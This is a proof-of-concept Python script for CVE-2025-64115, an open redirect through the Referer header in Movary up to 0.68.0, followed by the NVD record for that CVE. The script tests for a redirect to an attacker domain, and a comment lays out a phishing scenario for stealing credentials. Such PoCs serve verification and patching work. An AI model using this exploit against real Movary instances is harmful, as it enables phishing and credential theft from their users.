CVE-2025-64115

import requests # PoC for CVE-2025-64115 Open Redirect in Movary # Target: Movary <= 0.68.0 def exploit_open_redirect(target_url, malicious_domain): """ Exploit the open redirect vulnerability by manipulating the Referer header Args: target_url: Base URL of the vulnerable Movary instance malicious_domain: Attacker's controlled domain for redirect Returns: bool: True if the redirect is successful """ # Craft the malicious URL pointing to settings endpoint settings_endpoint = f"{target_url}/settings" # Set the Referer header to point to attacker-controlled site headers = { 'Referer': f"https://{malicious_domain}/malicious-page", 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64)' } try: # Send request to trigger redirect response = requests.get(settings_endpoint, headers=headers, allow_redirects=False) # Check if Location header contains the malicious domain if 'Location' in response.headers: location = response.headers['Location'] print(f"[+] Redirect Location: {location}") if malicious_domain in location: print("[!] Open Redirect Vulnerability Confirmed!") return True return False except requests.RequestException as e: print(f"[-] Error: {e}") return False # Example usage if __name__ == "__main__": target = "http://vulnerable-movary.com" attacker_domain = "evil-phishing-site.com" result = exploit_open_redirect(target, attacker_domain) print(f"Exploit Result: {result}") # Attack scenario: # 1. Attacker creates a phishing page on evil-phishing-site.com # 2. Attacker sends malicious link to victim # 3. Victim clicks link and visits vulnerable Movary site # 4. Application reads attacker's Referer header # 5. Victim gets redirected to phishing site # 6. Victim enters credentials on fake login page

{"cve": {"id": "CVE-2025-64115", "sourceIdentifier": "[email protected]", "published": "2025-10-30T18:15:33.363", "lastModified": "2025-12-08T15:34:33.193", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Movary is a web application to track, rate and explore your movie watch history. Versions up to and including 0.68.0 use the HTTP Referer header value directly for redirects in multiple settings endpoints, allowing a crafted link to cause an open redirect to an attacker-controlled site and facilitate phishing. This vulnerability is fixed in 0.69.0."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "ACTIVE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "LOW", "subIntegrityImpact": "LOW", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-601"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:leepeuker:movary:*:*:*:*:*:*:*:*", "versionEndExcluding": "0.69.0", "matchCriteriaId": "19118997-9D9D-427F-9958-F4471F9D0CFB"}]}]}], "references": [{"url": "https://github.com/leepeuker/movary/commit/716f703b4464ffdb0365c406f3660d275495769f", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/leepeuker/movary/pull/713", "source": "[email protected]", "tags": ["Issue Tracking"]}, {"url": "https://github.com/leepeuker/movary/security/advisories/GHSA-pm58-79jw-q79f", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}]}}